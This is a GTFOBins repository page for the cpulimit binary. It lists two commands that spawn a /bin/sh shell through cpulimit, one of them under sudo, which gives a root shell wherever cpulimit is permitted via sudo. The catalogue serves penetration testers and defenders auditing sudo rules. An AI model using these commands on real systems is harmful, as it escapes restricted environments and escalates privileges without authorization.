GTFOBins.github.io/_gtfobins/cpulimit.md

8 lines
141 B
Markdown
Raw Normal View History

2018-08-24 09:33:15 +00:00
---
functions:
execute-interactive:
- code: cpulimit -l 100 -f /bin/sh
sudo-enabled:
- code: sudo cpulimit -l 100 -f /bin/sh
---